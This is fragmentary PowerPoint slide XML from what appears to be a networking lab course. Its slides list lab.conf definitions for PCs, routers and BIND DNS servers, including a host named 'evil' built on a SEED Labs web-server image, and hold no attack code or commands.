                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2894500-B906-33FC-EE52-4210EEDA7A0B}"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="9328" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7901DD6E-E87B-E586-AA66-B042B9598BC6}"/>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DNS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9332" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54873EDC-4545-0211-0D2A-227DD3C6F2C2}"/>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dnsuni2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9333" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9ECCA72-7D83-4801-A6F1-0A042BED50B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7875292" y="3207861"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9334" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48435FB9-013D-C907-BFC0-0D9F67F0AE31}"/>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335" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D68FF29D-8A68-FC1A-5B4A-9C0BFF9E353B}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26003321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317CF-5970-6651-641A-C3CA0ABF347E}"/>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B7EAE383-6D4E-8AF8-D2B0-B5F75B09284D}"/>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CD29C4CA-918D-F7DF-8C81-EF6D72DD4762}"/>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2047DB9C-A31F-B22C-4983-74006706F51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6E38D683-504E-CC44-5406-02A29EA71195}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609093" y="1217551"/>
            <a:ext cx="7335694" cy="5063541"/>
            <a:chOff x="2448" y="3333"/>
            <a:chExt cx="3786" cy="722"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB10E369-F691-0C28-7427-18815AAF19A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="3362"/>
              <a:ext cx="3786" cy="69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pc1[0]="A"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc1[image]="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/base"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc1[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc2[0]="A"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc2[image]="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/base"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc2[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniromatre</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[0]="A"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniromatre</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>handsonsecurity</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seed-server:apache-php</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniromatre</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r1[0]="A"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r1[image]="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/base"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r1[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[0]="A"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[image]="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/bind:9.16"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CAADBF9-F74C-79B9-2E19-7A30C029391C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2491" y="3333"/>
              <a:ext cx="622"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err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lab.conf</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13300277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4986D-7200-5635-2856-1EEC1A9DD99E}"/>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49F2CD6E-C6C6-26BA-5186-7739839123EB}"/>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BCF2E14C-BEFD-D8CC-79E2-41AE4518D2EC}"/>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EC743C7E-D80B-807D-2CD6-1B2EFDA74FBE}"/>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FB3E12B5-3D59-231B-ADD7-4BF0AFE828FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609093" y="1217551"/>
            <a:ext cx="7335694" cy="5063541"/>
            <a:chOff x="2448" y="3333"/>
            <a:chExt cx="3786" cy="722"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29FA186C-B7C1-772C-B5A0-405C628585B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="3362"/>
              <a:ext cx="3786" cy="69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pc4[0]="B"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc4[image]="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/bind:9.16"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc4[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r2[0]="B"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r2[image]="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/base"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r2[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r1[1]="C"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r2[1]="C"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsit</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[0]="C"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsit</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[image]="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/bind:9.16"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsit</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsroot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[0]="C"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsroot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[image]="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/bind:9.16"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsroot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81FBB0DB-E380-E5DD-0E42-CE0E4237A7C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2491" y="3333"/>
              <a:ext cx="622"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err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lab.conf</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25453613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E1188-85FF-A0CD-391C-501009330532}"/>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02B97A9A-75CA-FE7D-8986-E147D129463C}"/>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8C71DE26-2A1C-7553-61ED-9533BDD44748}"/>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621AC629-7D4F-2988-77BD-476FEE28BC3B}"/>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DEC35567-6871-8383-C288-8BE4D2B0F92F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609093" y="1217551"/>
            <a:ext cx="7335694" cy="5063541"/>
            <a:chOff x="2448" y="3333"/>
            <a:chExt cx="3786" cy="722"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A9AC402-15C2-CFF5-6F05-66ACBF01F646}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="3362"/>
              <a:ext cx="3786" cy="69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marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" noProof="0"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pc3[0]="D"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc3[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lscr.io</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linuxserver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firefox</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pc3[port]="3001:3000"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc3[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bridged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true</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pc3[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc4[1]="D"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r1[2]="E"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[0]="E"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>handsonsecurity</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seed-server:apache-php</a:t>
              </a:r>
              <a:r>
